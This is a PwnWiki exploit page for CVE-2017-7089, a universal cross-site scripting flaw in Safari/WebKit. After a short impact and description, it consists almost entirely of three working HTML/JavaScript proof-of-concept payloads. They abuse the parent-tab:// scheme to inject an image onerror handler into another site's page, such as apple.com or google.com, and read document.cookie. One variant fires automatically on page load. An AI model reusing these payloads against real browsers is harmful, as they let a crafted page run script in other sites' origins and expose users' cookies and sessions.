CVE-2017-7089 WebkitWebkit(Safari)XSS

From PwnWiki
Revision as of 22:21, 29 March 2021 by Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> <!-- # CVE-2017-7089 **Impact**: Processing maliciously crafted web content may lead to universal cross site scripting **Description**: A logic issue existed...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

XSS

<!--
# CVE-2017-7089
 
**Impact**: Processing maliciously crafted web content may lead to universal cross site scripting
 
**Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.
 
#### Safari 10
 
##### Local SOP bypass
 
```html
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>
```
##### Exploit by Frans Rosén
```html
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>
```
-->
 
<body onload=document.getElementById('pew').click()>
<a id='pew' href='data:text/html,<script>function y(){x=open('parent-tab://apple.com','_top'),x.document.body.innerHTML='<img/src=""onerror=alert(document.domain);alert(document.cookie);>'};setTimeout(y,100)</script>'>hello</a>
</body>
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2017-7089_WebkitWebkit(Safari)XSS&oldid=751"